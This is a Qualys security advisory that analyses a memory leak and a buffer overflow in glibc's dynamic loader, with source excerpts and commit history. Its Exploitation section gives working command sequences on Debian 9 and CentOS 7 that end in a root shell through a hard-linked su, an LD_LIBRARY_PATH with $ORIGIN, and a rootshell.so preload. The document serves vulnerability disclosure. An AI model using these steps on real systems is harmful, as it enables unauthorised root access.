`
Qualys Security Advisory
Buffer overflow in glibc's ld.so
========================================================================
Contents
========================================================================
Summary
Memory Leak
Buffer Overflow
Exploitation
Acknowledgments
========================================================================
Summary
========================================================================
We have discovered a memory leak and a buffer overflow in the dynamic
loader (ld.so) of the GNU C Library (glibc):
- the memory leak (CVE-2017-1000408) first appeared in glibc 2.1.1
(released on May 24, 1999) and can be reached and amplified through
the LD_HWCAP_MASK environment variable;
- the buffer overflow (CVE-2017-1000409) first appeared in glibc 2.5
(released on September 29, 2006) and can be triggered through the
LD_LIBRARY_PATH environment variable.
Further investigation showed that:
- the buffer overflow is not exploitable if
/proc/sys/fs/protected_hardlinks is enabled (it is not enabled by
default on vanilla Linux kernels, but most Linux distributions turn it
on by default);
- the memory leak and the buffer overflow are not exploitable if the
glibc is patched against CVE-2017-1000366, because this patch ignores
the LD_HWCAP_MASK and LD_LIBRARY_PATH environment variables when SUID
binaries are executed (CVE-2017-1000366 was first patched in glibc
2.26, released on August 2, 2017, but most Linux distributions had
already backported this patch on June 19, 2017).
We have therefore rated the impact of these vulnerabilities as Low.
Nevertheless, we give a brief analysis of the vulnerable function, and
present a simple method for exploiting a SUID binary on the command line
and obtaining full root privileges (if /proc/sys/fs/protected_hardlinks
is not enabled, and CVE-2017-1000366 is not patched).
========================================================================
Memory Leak (CVE-2017-1000408)
========================================================================
------------------------------------------------------------------------
Analysis
------------------------------------------------------------------------
In _dl_init_paths(), ld.so malloc()ates "rtld_search_dirs.dirs[0]", a
cache of information about the system's trusted directories (typically
"/lib" and "/usr/lib" on 32-bit or "/lib64" and "/usr/lib64" on 64-bit).
To compute the number of system directories, ld.so uses the classic C
idiom "sizeof (system_dirs) / sizeof (system_dirs[0])":
691 rtld_search_dirs.dirs[0] = (struct r_search_path_elem *)
692 malloc ((sizeof (system_dirs) / sizeof (system_dirs[0]))
693 * round_size * sizeof (struct r_search_path_elem));
Unfortunately, "system_dirs" is not a classic array: it is not an array
of strings (pointers to characters), but rather an array of characters,
the concatenation of all system directories, separated by null bytes:
109 static const char system_dirs[] = SYSTEM_DIRS;
where "SYSTEM_DIRS" is generated by "gen-trusted-dirs.awk" (typically
"/lib/\0/usr/lib/" on 32-bit or "/lib64/\0/usr/lib64/" on 64-bit). As a
result, the number of system directories is overestimated, and too much
memory is allocated for "rtld_search_dirs.dirs[0]": if "system_dirs" is
"/lib/\0/usr/lib/" for example, the number of system directories is 2,
but 16 is used instead (the number of characters in "system_dirs") to
compute the size of "rtld_search_dirs.dirs[0]".
This extra memory is never accessed, never freed, and mostly filled with
null bytes, because only the information about "nsystem_dirs_len" system
directories (the correct number of system directories) is written to
"rtld_search_dirs.dirs[0]", and because the minimal malloc()
implementation in ld.so calls mmap(), but never munmap().
Moreover, this memory leak can be amplified through the LD_HWCAP_MASK
environment variable, because ld.so uses "ncapstr" (the total number of
hardware-capability combinations) to compute the size of
"rtld_search_dirs.dirs[0]":
687 round_size = ((2 * sizeof (struct r_search_path_elem) - 1
688 + ncapstr * sizeof (enum r_dir_status))
689 / sizeof (struct r_search_path_elem));
------------------------------------------------------------------------
History
------------------------------------------------------------------------
We tracked down this vulnerability to:
commit ab7eb292307152e706948a7b19164ff5e6d593d4
Date: Mon May 3 21:59:35 1999 +0000
Update.
* elf/Makefile (trusted-dirs.st): Use gen-trusted-dirs.awk.
* elf/gen-trusted-dirs.awk: New file.
* elf/dl-load.c (systems_dirs): Moved into file scope. Initialize
from SYSTEM_DIRS macro.
(system_dirs_len): New variable. Contains lengths of system_dirs
strings.
(fillin_rpath): Rewrite for systems_dirs being a simple string.
Improve string comparisons. Change parameter trusted to be a flag.
Change all callers.
(_dt_init_paths): Improve using new format for system_dirs.
which transformed "system_dirs" from an array of strings (pointers to
characters) into an array of characters:
- static const char *system_dirs[] =
- {
-#include "trusted-dirs.h"
- NULL
- };
...
+static const char system_dirs[] = SYSTEM_DIRS;
========================================================================
Buffer Overflow (CVE-2017-1000409)
========================================================================
------------------------------------------------------------------------
Analysis
------------------------------------------------------------------------
In _dl_init_paths(), ld.so computes "nllp", the number of
colon-separated directories in "llp" (the LD_LIBRARY_PATH environment
variable), malloc()ates "env_path_list.dirs", an array of "nllp + 1"
pointers to "r_search_path_elem" structures (one for each directory in
"llp", plus a terminating NULL pointer), and calls fillin_rpath() to
fill in "env_path_list.dirs":
777 if (llp != NULL && *llp != '\0')
778 {
779 size_t nllp;
780 const char *cp = llp;
781 char *llp_tmp;
...
803 nllp = 1;
804 while (*cp)
805 {
806 if (*cp == ':' || *cp == ';')
807 ++nllp;
808 ++cp;
809 }
810
811 env_path_list.dirs = (struct r_search_path_elem **)
812 malloc ((nllp + 1) * sizeof (struct r_search_path_elem *));
...
819 (void) fillin_rpath (llp_tmp, env_path_list.dirs, ":;",
820 __libc_enable_secure, "LD_LIBRARY_PATH",
821 NULL, l);
Unfortunately, ld.so parses the "llp" string to compute "nllp" but
parses the "llp_tmp" string (an expanded copy of "llp") to fill in
"env_path_list.dirs". As a result, the number of pointers written to
"env_path_list.dirs" can be greater than "nllp + 1" (an mmap()-based
buffer overflow) if the contents of "llp_tmp" differ from the contents
of "llp" (if "llp_tmp" contains more colons than "llp"):
784 /* Expand DSTs. */
785 size_t cnt = DL_DST_COUNT (llp, 1);
786 if (__glibc_likely (cnt == 0))
787 llp_tmp = strdupa (llp);
788 else
789 {
790 /* Determine the length of the substituted string. */
791 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);
792
793 /* Allocate the necessary memory. */
794 llp_tmp = (char *) alloca (total + 1);
795 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);
796 }
The Dynamic String Tokens (DSTs) $LIB and $PLATFORM are expanded to
fixed strings that do not contain colons (typically "lib" and "i686" on
32-bit or "lib64" and "x86_64" on 64-bit), but the expansion of $ORIGIN
(the directory of the binary being executed) can inject extra colons
into "llp_tmp" and hence extra pointers into "env_path_list.dirs".
To exploit this buffer overflow, a local attacker must therefore be able
to:
- hard-link a SUID binary into a directory whose pathname contains
colons (i.e., /proc/sys/fs/protected_hardlinks must not be enabled);
- pass the LD_LIBRARY_PATH environment variable to _dl_init_paths()
(i.e., CVE-2017-1000366 must not be patched).
------------------------------------------------------------------------
History
------------------------------------------------------------------------
We tracked down this vulnerability to:
commit 950398e1320255572f4228db94344dcd5f613455
Date: Tue Aug 29 01:44:27 2006 +0000
* elf/dl-load.c (_dl_init_paths): Expand DSTs.
which added the expansion of llp's Dynamic String Tokens (DSTs) to
_dl_init_paths():
- char *llp_tmp = strdupa (llp);
+ char *llp_tmp;
...
+ /* Expand DSTs. */
+ size_t cnt = DL_DST_COUNT (llp, 1);
+ if (__builtin_expect (cnt == 0, 1))
+ llp_tmp = strdupa (llp);
+ else
+ {
+ /* Determine the length of the substituted string. */
+ size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);
+
+ /* Allocate the necessary memory. */
+ llp_tmp = (char *) alloca (total + 1);
+ llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);
+ }
========================================================================
Exploitation
========================================================================
------------------------------------------------------------------------
Debian 9 (i386)
------------------------------------------------------------------------
In this example, we exploit the SUID-root binary "su" on a 32-bit Debian
9.0: we installed "debian-9.0.0-i386-xfce-CD-1.iso" (the last release
before glibc's CVE-2017-1000366 was patched), and manually disabled
protected_hardlinks ("echo 0 > /proc/sys/fs/protected_hardlinks").
1/ First, we identify the system's trusted directories (the only
directories accepted by fillin_rpath() when executing a SUID binary):
$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head
1607: find library=nonexistent [0]; searching
1607: search cache=/etc/ld.so.cache
1607: search path=/lib/i386-linux-gnu/tls/i686:/lib/i386-linux-gnu/tls:/lib/i386-linux-gnu/i686:/lib/i386-linux-gnu:/usr/lib/i386-linux-gnu/tls/i686:/usr/lib/i386-linux-gnu/tls:/usr/lib/i386-linux-gnu/i686:/usr/lib/i386-linux-gnu:/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)
1607: trying file=/lib/i386-linux-gnu/tls/i686/nonexistent
1607: trying file=/lib/i386-linux-gnu/tls/nonexistent
1607: trying file=/lib/i386-linux-gnu/i686/nonexistent
1607: trying file=/lib/i386-linux-gnu/nonexistent
1607: trying file=/usr/lib/i386-linux-gnu/tls/i686/nonexistent
1607: trying file=/usr/lib/i386-linux-gnu/tls/nonexistent
1607: trying file=/usr/lib/i386-linux-gnu/i686/nonexistent
The "system search path" line shows four system directories:
"/lib/i386-linux-gnu", "/usr/lib/i386-linux-gnu", "/lib", and "/usr/lib"
("tls" and "i686" are default hardware capabilities that are enabled
even if LD_HWCAP_MASK is 0).
2/ Second, we create our $ORIGIN directory and hard-link the SUID-root
binary "su" into it:
$ mkdir -p '/var/tmp/:/lib:/usr/lib:'
$ cd '/var/tmp/:/lib:/usr/lib:'
$ ln `which su` .
The pathname of our $ORIGIN directory contains two system directories:
we will write 12 bytes (3 pointers: one for each system directory, plus
a terminating NULL pointer) to an 8-byte "env_path_list.dirs" ("nllp" is
only 1, because our unexpanded LD_LIBRARY_PATH does not contain colons).
In other words, we will overflow "env_path_list.dirs" and write 4 bytes
(the terminating NULL pointer) out of bounds.
3/ Third, we overwrite this out-of-bounds NULL pointer with the first
bytes of an error message ("cannot open shared object file") that is
malloc()ated after "env_path_list.dirs" because of our "nonexistent"
preload library. Consequently, ld.so crashes when open_path() tries to
open our second preload library "rootshell.so" in a directory described
by an "r_search_path_elem" structure located at the unmapped address
0x6e6e6163 (the overwritten NULL pointer):
$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
Segmentation fault
$ dmesg | tail -n 1
[70632.888695] su[2293]: segfault at 6e6e6173 ip b77e1c43 sp bfc946dc error 4 in ld-2.24.so[b77db000+22000]
The "/../../../../../../../../$LIB" suffix is required, to pass the
"check_for_trusted" test in _dl_dst_substitute() (our expanded
LD_LIBRARY_PATH must be rooted in one of the system's trusted
directories).
4/ Next, we copy the library dependencies of "su" to our current working
directory, and compile our preload library "rootshell.so" ("la.c" can be
found at the beginning of our stack-clash exploit "Linux_ldso_hwcap.c"):
$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .
$ cat > la.c << "EOF"
> static void __attribute__ ((constructor)) _init (void) {
> ...
> // setuid(0);
> ...
> // execve("/bin/sh");
> ...
> }
> EOF
$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c
$ chmod u+s rootshell.so
This "chmod" is required, to pass the SUID-bit test in open_path().
5/ Last, we run "su" with an increasing number of hardware capabilities
(i.e., with an increasingly large "rtld_search_dirs.dirs[0]"), until the
"rtld_search_dirs.dirs[0]" occupies the address 0x6e6e6163. Because this
"rtld_search_dirs.dirs[0]" is mostly filled with null bytes, and because
an "r_search_path_elem" structure filled with null bytes is equivalent
to the current working directory in open_path(), ld.so will eventually
load and execute our "rootshell.so" from the current working directory:
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<16)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
Segmentation fault
real 0m0.715s
user 0m0.120s
sys 0m0.588s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<17)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
Segmentation fault
real 0m1.443s
user 0m0.368s
sys 0m1.072s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<18)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
Segmentation fault
real 0m2.840s
user 0m0.656s
sys 0m2.172s
...
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<23)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
Segmentation fault
real 0m5.778s
user 0m1.200s
sys 0m4.576s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<24)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
Segmentation fault
real 0m11.589s
user 0m2.520s
sys 0m9.060s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
# id; exit
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)
real 0m28.050s
user 0m6.140s
sys 0m21.892s
6/ Improvements in the running time of this exploit are left as an
exercise for the interested reader:
$ env -i LD_LIBRARY_PATH=. LD_PRELOAD=nonexistent LD_HWCAP_MASK="$(((1<<25)-1))" LD_DEBUG=libs env 2>&1 | head -c 1000
3084: find library=nonexistent [0]; searching
3084: search path=./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mc
$ mkdir -p './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'
$ mv -- *.so* './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
# id; exit
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)
real 0m23.485s
user 0m5.244s
sys 0m18.220s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
ERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.
# id; exit
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)
real 0m11.352s
user 0m2.844s
sys 0m8.388s
------------------------------------------------------------------------
CentOS 7 (i386)
------------------------------------------------------------------------
In this example, we exploit "su" on a 32-bit CentOS 7.3.1611: we
installed "CentOS-7-i386-Minimal-1611.iso" (the last release before
CVE-2017-1000366 was patched), and manually disabled protected_hardlinks
("echo 0 > /proc/sys/fs/protected_hardlinks").
$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head
17896: find library=nonexistent [0]; searching
17896: search cache=/etc/ld.so.cache
17896: search path=/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)
17896: trying file=/lib/tls/i686/nonexistent
17896: trying file=/lib/tls/nonexistent
17896: trying file=/lib/i686/nonexistent
17896: trying file=/lib/nonexistent
17896: trying file=/usr/lib/tls/i686/nonexistent
17896: trying file=/usr/lib/tls/nonexistent
17896: trying file=/usr/lib/i686/nonexistent
$ mkdir -p '/var/tmp/:/lib:/usr/lib:'
$ cd '/var/tmp/:/lib:/usr/lib:'
$ ln `which su` .
$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
Segmentation fault
$ dmesg | tail -n 1
[ 8414.911000] su[18088]: segfault at 6e6e6173 ip b77645e2 sp bfe0cb40 error 4 in ld-2.17.so[b775f000+1f000]
$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .
$ cat > la.c << "EOF"
> static void __attribute__ ((constructor)) _init (void) {
> ...
> // setuid(0);
> ...
> // execve("/bin/sh");
> ...
> }
> EOF
$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c
$ chmod u+s rootshell.so
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<16)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
Segmentation fault
real 0m0.527s
user 0m0.085s
sys 0m0.441s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<17)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
Segmentation fault
real 0m1.060s
user 0m0.182s
sys 0m0.877s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<18)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
Segmentation fault
real 0m2.093s
user 0m0.384s
sys 0m1.702s
...
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
Segmentation fault
real 0m17.071s
user 0m2.525s
sys 0m14.537s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<26)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
Segmentation fault
real 0m33.926s
user 0m5.464s
sys 0m28.429s
$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK="$(((1<<27)-1))" ./su
ERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.
sh-4.2# id; exit
uid=0(root) gid=0(root) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
real 1m30.604s
user 0m16.169s
sys 1m14.395s
========================================================================
Acknowledgments
========================================================================
We thank the members of the linux-distros@openwall list.
`